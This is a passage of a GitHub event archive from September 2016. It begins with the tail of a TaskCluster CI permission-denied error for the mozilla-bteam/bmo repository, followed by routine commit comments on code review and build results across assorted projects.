\\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"D-DfahTTRYOxDmjmjfK8Ew\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T02:27:09.131Z\\\"\\n}\\n  time:     2016-09-28T02:27:09.278Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"KZ3crLfVReGYqH3eLNRtbQ\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"San\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"sanity\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Basic Sanity Tests\\\",\\n    \\\"description\\\": \\\"Basic Sanity Tests\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-28T02:27:09.131Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T02:27:09.131Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"D-DfahTTRYOxDmjmjfK8Ew\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T02:27:09.131Z\\\"\\n}\\n  time:     2016-09-28T02:27:09.278Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"KZ3crLfVReGYqH3eLNRtbQ\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"San\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"sanity\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 8,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-bteam\",\n                            \"GITHUB_BASE_SHA\": \"639a051e3aea3608efd7607b944b2c33aa17cfe5\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"mozilla-bteam\",\n                            \"GITHUB_HEAD_SHA\": \"4250271527caadb3eefd54ccf068f610f5d93a46\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"mozilla-bteam@noreply.github.com\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Basic Sanity Tests\",\n                        \"description\": \"Basic Sanity Tests\",\n                        \"owner\": \"mozilla-bteam@noreply.github.com\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-28T02:27:09.131Z\",\n                    \"deadline\": \"2016-09-29T02:27:09.131Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"D-DfahTTRYOxDmjmjfK8Ew\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-29T02:27:09.131Z\"\n                },\n                \"time\": \"2016-09-28T02:27:09.278Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-bteam/bmo:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-28T02:27:09Z"}
{"id":"4628135962","type":"CommitCommentEvent","actor":{"login":"sgillen"},"repo":{"name":"robotics-at-maryland/qubo"},"payload":{"comment":{"id":19201190,"position":null,"line":null,"path":null,"commit_id":"7c9ac23b18394c5b50f0bc6cd741261144b41118","created_at":"2016-09-28T02:29:23Z","updated_at":"2016-09-28T02:29:23Z","body":"We should make this two separate files or merge them together since we'll need to merge with with master eventually. "}},"created_at":"2016-09-28T02:29:23Z"}
{"id":"4628142475","type":"CommitCommentEvent","actor":{"login":"rbaehr"},"repo":{"name":"robotics-at-maryland/qubo"},"payload":{"comment":{"id":19201203,"position":null,"line":null,"path":null,"commit_id":"7c9ac23b18394c5b50f0bc6cd741261144b41118","created_at":"2016-09-28T02:31:43Z","updated_at":"2016-09-28T02:31:43Z","body":"This file is removed and replaced by a new readme in the embedded directory in one of the later commits so it shouldn't be a problem merging it"}},"created_at":"2016-09-28T02:31:43Z"}
{"id":"4628147264","type":"CommitCommentEvent","actor":{"login":"Krisnakumalasari"},"repo":{"name":"Krisnakumalasari/PendaftaranAnggotaPerpus"},"payload":{"comment":{"id":19201207,"position":null,"line":null,"path":null,"commit_id":"e13dc7be7d1129d6cf24b12e6dbc5fac7c6f6db2","created_at":"2016-09-28T02:33:25Z","updated_at":"2016-09-28T02:33:25Z","body":"Screenshoots aplikasi:\r\n![krisna wahyu kumalasari_xiirpl4_19_tugas1_1](https://cloud.githubusercontent.com/assets/15698947/18898842/77933cc4-855e-11e6-8a5d-4d7455c1a8c5.jpg)\r\n![krisna wahyu kumalasari_xiirpl4_19_tugas1_2](https://cloud.githubusercontent.com/assets/15698947/18898848/7fdfd068-855e-11e6-95d0-0b87ce388325.jpg)\r\n![krisna wahyu kumalasari_xiirpl4_19_tugas1_3](https://cloud.githubusercontent.com/assets/15698947/18898854/8671a1fe-855e-11e6-9a51-01691a16179f.jpg)\r\n![krisna wahyu kumalasari_xiirpl4_19_tugas1_4](https://cloud.githubusercontent.com/assets/15698947/18898858/8cf1d1a2-855e-11e6-83c9-1a8a7bff32c2.jpg)\r\n\r\n"}},"created_at":"2016-09-28T02:33:25Z"}
{"id":"4628150085","type":"CommitCommentEvent","actor":{"login":"kaylagantz"},"repo":{"name":"kaylagantz/Week-5"},"payload":{"comment":{"id":19201210,"position":null,"line":null,"path":null,"commit_id":"033f9208786d8784fe71599e8667ddd4c6004c50","created_at":"2016-09-28T02:34:26Z","updated_at":"2016-09-28T02:34:26Z","body":"\r\n/<kaylagantz>.github.io\r\n\tindex.html\r\n\t/inet1650\r\n\t\t/week4\r\n\t\t\tindex.html\r\n\t\t\tpage1.html\r\n\t\t\t/info\r\n\t\t\t\tpage2.html\r\n\t\t\t/content\r\n\t\t\t\tPage3.html\r\n\t\t/week5\r\n\t\t\tindex.html\r\n"}},"created_at":"2016-09-28T02:34:26Z"}
{"id":"4628151694","type":"CommitCommentEvent","actor":{"login":"thammegowda"},"repo":{"name":"USCDataScience/sparkler"},"payload":{"comment":{"id":19201214,"position":null,"line":null,"path":null,"commit_id":"d77618cba2599b7608db003f466bbaa0273be17a","created_at":"2016-09-28T02:35:00Z","updated_at":"2016-09-28T02:35:00Z","body":"Not really!\r\nWe should remove it\r\nGive it a try"}},"created_at":"2016-09-28T02:35:00Z"}
{"id":"4628153119","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19201216,"position":null,"line":null,"path":null,"commit_id":"b0d0a01c8dbdc6a728bdb19dcec990e7c8ddba77","created_at":"2016-09-28T02:35:33Z","updated_at":"2016-09-28T02:35:33Z","body":"update_standards_gem (asparke2) - x86_64-MacOS-10.10-clang: OK (2379 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b0d0a01c8dbdc6a728bdb19dcec990e7c8ddba77-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b0d0a01c8dbdc6a728bdb19dcec990e7c8ddba77-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.18%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T02:35:33Z"}
{"id":"4628153542","type":"CommitCommentEvent","actor":{"login":"bontrose"},"repo":{"name":"bontrose/s4xbot"},"payload":{"comment":{"id":19201219,"position":11,"line":26,"path":"s4xb0t.py","commit_id":"f84edc7896fbfcd39da3aeb807963cb35e83cdf0","created_at":"2016-09-28T02:35:43Z","updated_at":"2016-09-28T02:35:43Z","body":"if i change it to !d# then we have issues with any command that starts with d"}},"created_at":"2016-09-28T02:35:43Z"}
{"id":"4628153962","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19201220,"position":null,"line":null,"path":null,"commit_id":"34a5020df0f106c14b556990bf7d3f0f54841839","created_at":"2016-09-28T02:35:53Z","updated_at":"2016-09-28T02:35:53Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - i386-Windows-7-VisualStudio-12: Tests Failed (1766 of 2340 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a5020df0f106c14b556990bf7d3f0f54841839-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a5020df0f106c14b556990bf7d3f0f54841839-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.47%25-red.svg)</a> \n"}},"created_at":"2016-09-28T02:35:53Z"}
{"id":"4628154213","type":"CommitCommentEvent","actor":{"login":"lundman"},"repo":{"name":"openzfs/openzfs"},"payload":{"comment":{"id":19201221,"position":19,"line":1624,"path":"usr/src/uts/common/fs/zfs/dmu_send.c","commit_id":"e8f855323077509aceff1be5677205b59f3a17b2","created_at":"2016-09-28T02:35:59Z","updated_at":"2016-09-28T02:35:59Z","body":"If not in DEBUG doesn't this reduce down to just rrw_enter() rrw_exit()?  Or is it acting as a barrier?\r\n"}},"created_at":"2016-09-28T02:35:59Z"}
{"id":"4628156207","type":"CommitCommentEvent","actor":{"login":"sunriseforever1"},"repo":{"name":"sunriseforever1/great_journey"},"payload":{"comment":{"id":19201266,"position":1,"line":1,"path":"README.md","commit_id":"6eb5167264be70c03cb2d5bbfab8040810ffd2e0","created_at":"2016-09-28T02:36:43Z","updated_at":"2016-09-28T02:36:43Z","body":"I'm very interisted in machine learning and AI.And I wana go on a jurney in this field."}},"created_at":"2016-09-28T02:36:43Z"}
{"id":"4628156546","type":"CommitCommentEvent","actor":{"login":"NP-Hardass"},"repo":{"name":"mate-desktop/mate-applets"},"payload":{"comment":{"id":19201267,"position":null,"line":null,"path":null,"commit_id":"a708224decae0f7417aa38b926318fa32747b161","created_at":"2016-09-28T02:36:50Z","updated_at":"2016-09-28T02:36:50Z","body":"So, is the claim being made that cpupower 4.8 works, but cpupower 4.7 doesn't?"}},"created_at":"2016-09-28T02:36:50Z"}
{"id":"4628157270","type":"CommitCommentEvent","actor":{"login":"patricksav"},"repo":{"name":"operationzombie/apache-base"},"payload":{"comment":{"id":19201270,"position":5,"line":62,"path":"apache_flask.py","commit_id":"d1fe8edd665728ab4437f162236a3e865a94942c","created_at":"2016-09-28T02:37:05Z","updated_at":"2016-09-28T02:37:05Z","body":"Should there be an open bracket to match?"}},"created_at":"2016-09-28T02:37:05Z"}
{"id":"4628158321","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mloebens/crescer-2016-2"},"payload":{"comment":{"id":19201271,"position":16,"line":16,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembas.java","commit_id":"c8d93f83bf36f7b96b7a0f68227df978aba54d8b","created_at":"2016-09-28T02:37:30Z","updated_at":"2016-09-28T02:37:30Z","body":"Existem formas mais legíveis, mas você pode dar o return direto:\r\n\r\n```Java\r\nreturn !(quantidade <= 3 || quantidade > 100 || quantidade % 2 != 0);\r\n```"}},"created_at":"2016-09-28T02:37:30Z"}
{"id":"4628158559","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19201272,"position":null,"line":null,"path":null,"commit_id":"45280bf91ab3987b2e4e49617b693d09b1b17085","created_at":"2016-09-28T02:37:35Z","updated_at":"2016-09-28T02:37:35Z","body":"Oh, now I see why `d1` passed but none of the others!  Now I also remember why I hate imperative programming so...  Global state is just evil, especially when it's not obvious that it is there."}},"created_at":"2016-09-28T02:37:35Z"}
{"id":"4628161428","type":"CommitCommentEvent","actor":{"login":"Krisnakumalasari"},"repo":{"name":"Krisnakumalasari/PendaftaranAnggotaPerpus"},"payload":{"comment":{"id":19201275,"position":7,"line":7,"path":"README.md","commit_id":"e13dc7be7d1129d6cf24b12e6dbc5fac7c6f6db2","created_at":"2016-09-28T02:38:38Z","updated_at":"2016-09-28T02:38:38Z","body":"Ini adalah link screenshoots https://github.com/Krisnakumalasari/PendaftaranAnggotaPerpus/issues/1"}},"created_at":"2016-09-28T02:38:38Z"}
{"id":"4628162006","type":"CommitCommentEvent","actor":{"login":"flyboarder"},"repo":{"name":"hoplon/boot-hoplon"},"payload":{"comment":{"id":19201277,"position":5,"line":8,"path":"build.boot","commit_id":"50b0f54b63ddb8bff014b37c3b402b4b02a27b22","created_at":"2016-09-28T02:38:51Z","updated_at":"2016-09-28T02:38:51Z","body":"This can be removed since we are not providing an option for goog"}},"created_at":"2016-09-28T02:38:51Z"}
{"id":"4628162678","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mloebens/crescer-2016-2"},"payload":{"comment":{"id":19201282,"position":23,"line":23,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembasTest.java","commit_id":"ad0669494dd8248ce00452729b3453f57e0351cc","created_at":"2016-09-28T02:39:08Z","updated_at":"2016-09-28T02:39:08Z","body":"pode fazer direto:\r\n\r\n```Java\r\nassertFalse(lembas.podeDividirEmPares());\r\n```"}},"created_at":"2016-09-28T02:39:08Z"}
{"id":"4628164884","type":"CommitCommentEvent","actor":{"login":"DarkSon09"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19201290,"position":null,"line":null,"path":null,"commit_id":"c8bfc7355ac2aa921e1d195233fb67ef84ec0e71","created_at":"2016-09-28T02:39:54Z","updated_at":"2016-09-28T02:39:54Z","body":"Dear gadgetsgalaxy,\r\nyou just copy the exe file to the old folder only, no need to change profile ."}},"created_at":"2016-09-28T02:39:54Z"}
{"id":"4628165338","type":"CommitCommentEvent","actor":{"login":"RodrigoScheuer"},"repo":{"name":"RodrigoScheuer/crescer-2016-2"},"payload":{"comment":{"id":19201291,"position":27,"line":27,"path":"src/modulo-01-java-OO/modulo-01/ElfoTest.java","commit_id":"65cb6a73080ceec508c4876554408d5063400b5e","created_at":"2016-09-28T02:40:03Z","updated_at":"2016-09-28T02:40:03Z","body":"ok"}},"created_at":"2016-09-28T02:40:03Z"}
{"id":"4628166960","type":"CommitCommentEvent","actor":{"login":"neroniaky"},"repo":{"name":"neroniaky/angular2-token"},"payload":{"comment":{"id":19201293,"position":null,"line":null,"path":null,"commit_id":"709d27e665b9a82357810a12aceb1a08b4ac8fef","created_at":"2016-09-28T02:40:38Z","updated_at":"2016-09-28T02:40:38Z","body":"Hey @fbobbio thanks for your feedback. I was thinking of changing the peer dependencies to `^2.0.0` instead of `2.0.1`."}},"created_at":"2016-09-28T02:40:38Z"}
{"id":"4628169261","type":"CommitCommentEvent","actor":{"login":"mloebens"},"repo":{"name":"mloebens/crescer-2016-2"},"payload":{"comment":{"id":19201297,"position":16,"line":16,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembas.java","commit_id":"c8d93f83bf36f7b96b7a0f68227df978aba54d8b","created_at":"2016-09-28T02:41:27Z","updated_at":"2016-09-28T02:41:27Z","body":"Beleza! Mas o que devo considerar mais. ser legibilidade ou eficiência/simplicidade?"}},"created_at":"2016-09-28T02:41:27Z"}
{"id":"4628173810","type":"CommitCommentEvent","actor":{"login":"pkleckner"},"repo":{"name":"mosh-hamedani/angular2-course"},"payload":{"comment":{"id":19201310,"position":null,"line":null,"path":null,"commit_id":"29bbb8b2d8961321557f487c1b6203d1ce500280","created_at":"2016-09-28T02:42:59Z","updated_at":"2016-09-28T02:42:59Z","body":"@Methodician That's precisely what I did, and it seems to work just fine."}},"created_at":"2016-09-28T02:42:59Z"}
{"id":"4628175157","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19201314,"position":null,"line":null,"path":null,"commit_id":"4d18f595dcc9ce6f7431d8f66e39774ce6256503","created_at":"2016-09-28T02:43:27Z","updated_at":"2016-09-28T02:43:27Z","body":"Actually you are testing 3 pawns on same rank, such c4 d4 e4\r\n(because shift left e4 is d5, shift right c4 is d5 and shit up d4 is d5)\r\n\r\nIt seems to work, but this is not what we call a Stonewall.\r\nWas this the intent ?"}},"created_at":"2016-09-28T02:43:27Z"}
{"id":"4628175393","type":"CommitCommentEvent","actor":{"login":"AmbientMalice"},"repo":{"name":"gonetz/GLideN64"},"payload":{"comment":{"id":19201316,"position":null,"line":null,"path":null,"commit_id":"d5412d30e1c909956ef2a1bd24bda27ab71fc6e5","created_at":"2016-09-28T02:43:32Z","updated_at":"2016-09-28T02:43:32Z","body":"What does this commit do?"}},"created_at":"2016-09-28T02:43:32Z"}
{"id":"4628179136","type":"CommitCommentEvent","actor":{"login":"mjangda"},"repo":{"name":"Automattic/amp-wp"},"payload":{"comment":{"id":19201319,"position":13,"line":56,"path":"includes/amp-post-template-actions.php","commit_id":"914ecc7d2246e0e0a4a56a887c3521d68212fa2c","created_at":"2016-09-28T02:44:56Z","updated_at":"2016-09-28T02:44:56Z","body":"Minor: code readability could be improved using sprintf:\r\n\r\n```\r\nsprintf( '%s { %s }', $selector, $declarations );\r\n```"}},"created_at":"2016-09-28T02:44:56Z"}
{"id":"4628181017","type":"CommitCommentEvent","actor":{"login":"evanjack2002"},"repo":{"name":"evanjack2002/raytracing-1"},"payload":{"comment":{"id":19201322,"position":8,"line":49,"path":"Makefile","commit_id":"ff77f9b35a8966036a441f3cc103c43e8556d4df","created_at":"2016-09-28T02:45:37Z","updated_at":"2016-09-28T02:45:37Z","body":"OK, thanks."}},"created_at":"2016-09-28T02:45:37Z"}
{"id":"4628181303","type":"CommitCommentEvent","actor":{"login":"mjangda"},"repo":{"name":"Automattic/amp-wp"},"payload":{"comment":{"id":19201325,"position":11,"line":54,"path":"includes/amp-post-template-actions.php","commit_id":"914ecc7d2246e0e0a4a56a887c3521d68212fa2c","created_at":"2016-09-28T02:45:43Z","updated_at":"2016-09-28T02:45:43Z","body":"I think we can remove the line break and tabs for output. It doesn't need to be pretty."}},"created_at":"2016-09-28T02:45:43Z"}
{"id":"4628183179","type":"CommitCommentEvent","actor":{"login":"mloebens"},"repo":{"name":"mloebens/crescer-2016-2"},"payload":{"comment":{"id":19201331,"position":23,"line":23,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembasTest.java","commit_id":"ad0669494dd8248ce00452729b3453f57e0351cc","created_at":"2016-09-28T02:46:23Z","updated_at":"2016-09-28T02:46:23Z","body":"Certo! Vi que tem o assertTrue também."}},"created_at":"2016-09-28T02:46:23Z"}
